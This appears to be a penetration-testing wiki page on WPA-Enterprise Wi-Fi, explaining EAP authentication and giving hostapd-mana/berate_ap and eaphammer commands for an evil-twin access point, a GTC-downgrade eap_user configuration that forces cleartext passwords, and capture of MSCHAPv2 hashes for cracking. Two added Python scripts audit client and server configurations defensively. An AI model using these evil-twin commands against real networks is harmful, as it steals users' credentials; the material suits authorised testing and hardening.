WPA-Enterprise

WPA-Enterprise delegates authentication to a RADIUS server. Even though it is not vulnerable to any direct attack, it is still possible to intercept credentials by performing an evil-twin attack against clients.

Theory

WPA-Enterprise, also referred to as WPA-EAP or WPA-802.1X, relies on the EAP authentication framework, which provides a transport mechanism for many other authentication methods, such as:

These authentication methods allow the access point to delegate the authentication to a RADIUS server.

[Figure: EAP.png]

Certificate Authentication

All modern clients use EAP-TLS when authenticating with a certificate. Unlike most TLS deployments for HTTPS, the majority of EAP-TLS implementations require a client certificate and offer no option to disable this requirement.

[Figure: EAP-TLS.png]

Credentials Authentication

Most modern clients use PEAP or EAP-TTLS when authenticating with a username and password. These protocols, which are similar in design, consist of two authentication layers:

[Figure: PEAP_EAP-TTLS.png]

Tip

Most clients prefer MSCHAPv2 as the inner-layer authentication protocol, which requires you to crack the captured challenge-response to recover the cleartext credentials. However, it is possible to capture cleartext credentials directly by performing a GTC downgrade attack, i.e. forcing the client to use the weaker GTC authentication protocol.

Evil-Twin Attack

This attack consists of creating a rogue access point that mimics the targeted ESSID so that clients perform the inner authentication with your rogue RADIUS server, allowing you to capture the credentials or challenge-response used during inner authentication.

This attack will not work against clients configured to:
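On the client side, whether a supplicant accepts a rogue RADIUS server comes down to a few settings in its network profile. The script below is an added, defender-side example (not from the original page, nor from hostapd-mana or eaphammer): it parses wpa_supplicant network blocks and flags a missing ca_cert, a missing server-name check (domain_match, domain_suffix_match or subject_match), an unrestricted phase2 setting, and cleartext inner methods (GTC, PAP). The option names are real wpa_supplicant.conf keys; the two configurations are constructed samples.

```python
"""Audit wpa_supplicant network blocks for WPA-Enterprise settings that let a
client accept a rogue (evil-twin) RADIUS server.

Added example for this page; not part of the original text, nor of hostapd-mana
or eaphammer.  The option names are real wpa_supplicant.conf keys; both
configurations below are constructed samples.
"""
import re
from typing import Dict, List

# Constructed sample: two "just works" profiles with little or no server validation.
WEAK_CONF = '''
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="Legacy"
    key_mgmt=WPA-EAP
    eap=TTLS
    identity="bob"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    phase2="auth=PAP"
}
'''

# Constructed sample: the same PEAP profile with the server pinned to a CA and a name.
HARDENED_CONF = '''
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
'''

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
KV_RE = re.compile(r'^\s*(\w+)\s*=\s*"?([^"\n]*?)"?\s*$', re.M)
NAME_CHECKS = ("domain_match", "domain_suffix_match", "subject_match")
CLEARTEXT_INNER = {"GTC", "PAP"}   # inner methods that hand the password to the server as-is


def parse_networks(conf: str) -> List[Dict[str, str]]:
    """Return one {option: value} dict per network={...} block (quotes stripped)."""
    return [dict(KV_RE.findall(body)) for body in BLOCK_RE.findall(conf)]


def audit_network(net: Dict[str, str]) -> List[str]:
    """Findings for one block; an empty list means nothing was flagged."""
    findings = []
    if "WPA-EAP" not in net.get("key_mgmt", ""):
        return findings                                  # not an 802.1X network
    if "ca_cert" not in net:
        findings.append("no ca_cert: any server certificate is accepted")
    if not any(k in net for k in NAME_CHECKS):
        findings.append("no server name check: any certificate issued by the CA is accepted")
    phase2 = net.get("phase2", "")                       # e.g. auth=MSCHAPV2 or autheap=GTC
    if not phase2:
        findings.append("phase2 unset: inner method not restricted by the client")
    for method in re.findall(r"auth(?:eap)?=([A-Z0-9]+)", phase2):
        if method in CLEARTEXT_INNER:
            findings.append(f"inner method {method} sends the password in cleartext to the server")
    return findings


def audit(conf: str) -> Dict[str, List[str]]:
    """Map each SSID in the config to its list of findings."""
    return {net.get("ssid", "?"): audit_network(net) for net in parse_networks(conf)}


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        for ssid, findings in audit(conf).items():
            print(f"[{label}] {ssid}: {findings or 'OK'}")
```

Without ca_cert the supplicant accepts whatever certificate the rogue RADIUS server presents, and a CA alone is not enough if the CA issues certificates to more than one name, which is why the name check is flagged separately.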

hostapd-mana

Using hostapd-mana with berate_ap, it is possible to create an evil-twin access point configured to intercept various EAP credentials:

berate_ap -n <iface> <ESSID> --eap --mana-wpe --mana-credout [/path/to/output]

Source: github.com/sensepost/hostapd-mana, github.com/sensepost/berate_ap

This will automatically prompt you to fill in the information required to create the rogue RADIUS certificate. Use the following additional options to fine-tune the evil-twin access point configuration:

Option                       Description
--mac [00:11:22:33:44:55]    Access point BSSID
-c [channel]                 Access point channel (list of WLAN channels)
--freq-band [2.4/5]          Set frequency band
--ieee80211ac                Enable IEEE 802.11ac

See berate_ap -h and the hostapd-mana wiki for more details.

Tip

To perform a GTC downgrade attack, use the option --eap-user-file /path/to/eap_user with the following configuration file:

# Phase 1 users
*   PEAP,TTLS,TLS,FAST

# Phase 2 users
"t"   GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS  "t"   [2]
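The eap_user format above is the same one that configures hostapd's integrated EAP server in ordinary deployments, so it is worth being able to read it and to spot inner methods that deliver the password in cleartext. The script below is an added example (not from the original page, nor from hostapd-mana or eaphammer): it parses eap_user lines (identity, comma-separated methods, optional password, optional [2] phase marker, '#' comment lines), reports the cleartext-capable phase-2 methods each entry offers, and shows which inner method the server proposes first, since hostapd walks the method list in order. The sample input is the configuration quoted above.

```python
"""Parse a hostapd eap_user file and report which phase-2 (inner) methods would
receive the user's password in cleartext.

Added example for this page; not part of the original text, nor of hostapd-mana
or eaphammer.  The grammar follows hostapd's eap_user format; the sample is the
downgrade configuration quoted on the page.
"""
import shlex
from dataclasses import dataclass
from typing import Dict, List, Optional

# Inner methods grouped by what the client sends inside the TLS tunnel.
CLEARTEXT = {"GTC", "TTLS-PAP"}                                   # password as-is
CHALLENGE_RESPONSE = {"MD5", "TTLS-CHAP", "TTLS-MSCHAP", "MSCHAPV2", "TTLS-MSCHAPV2"}

SAMPLE = '''
# Phase 1 users
*   PEAP,TTLS,TLS,FAST

# Phase 2 users
"t"   GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS  "t"   [2]
'''


@dataclass
class EapUser:
    identity: str                 # "*" matches any identity
    methods: List[str]            # offered in this order; the server proposes the first
    password: Optional[str] = None
    phase: int = 1                # 1 = outer (tunnel) method, 2 = inner method


def parse_eap_users(text: str) -> List[EapUser]:
    """One EapUser per non-comment line; shlex handles the quoted fields."""
    users = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)
        identity, methods = tokens[0], tokens[1].split(",")
        password, phase = None, 1
        for tok in tokens[2:]:
            if tok == "[2]":
                phase = 2
            elif not tok.startswith("["):   # other [..] flags such as [ver=0] are ignored here
                password = tok
        users.append(EapUser(identity, methods, password, phase))
    return users


def cleartext_exposure(users: List[EapUser]) -> Dict[str, List[str]]:
    """For each phase-2 identity, the cleartext-capable inner methods it offers, in order."""
    return {u.identity: [m for m in u.methods if m in CLEARTEXT]
            for u in users if u.phase == 2}


def first_inner_method(users: List[EapUser], identity: str) -> Optional[str]:
    """The inner method the server proposes first for `identity` ("*" as fallback)."""
    for wanted in (identity, "*"):
        for u in users:
            if u.phase == 2 and u.identity == wanted:
                return u.methods[0]
    return None


if __name__ == "__main__":
    users = parse_eap_users(SAMPLE)
    for u in users:
        print(f"phase {u.phase} identity={u.identity!r} methods={u.methods}")
    print("cleartext-capable inner methods:", cleartext_exposure(users))
    print("first inner method offered to 't':", first_inner_method(users, "t"))
```

Run against your own hostapd EAP server configuration, an empty result from cleartext_exposure means no inner method can hand the server a cleartext password, and first_inner_method shows what a client that does not restrict its phase-2 method would be offered.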

The collected credentials can be found in the file specified by the --mana-credout option:

[Figure: wpa-eap-hostapd-mana.png]

eaphammer

Warning

This tool needs to be run from its installation directory, i.e. ./eaphammer.

First, generate a fake certificate for the rogue RADIUS server:

./eaphammer --cert-wizard

Then, start the evil-twin access point with the name of the targeted ESSID:

./eaphammer -i <iface> -e <ESSID> --creds

Use the following additional options to fine-tune the evil-twin access point configuration:

Option                       Description
-b [00:11:22:33:44:55]       Access point BSSID
--hw-mode [g/a]              Hardware mode: g for 2.4 GHz, a for 5 GHz
-c [channel]                 Access point channel (list of WLAN channels)

Tip

The GTC downgrade attack is performed automatically by eaphammer.

When a client tries to authenticate to your rogue access point, eaphammer should display the captured MSCHAPv2 challenge-response in hashcat -m 5500 format.

[Figure: wpa-eap-eaphammer.png]
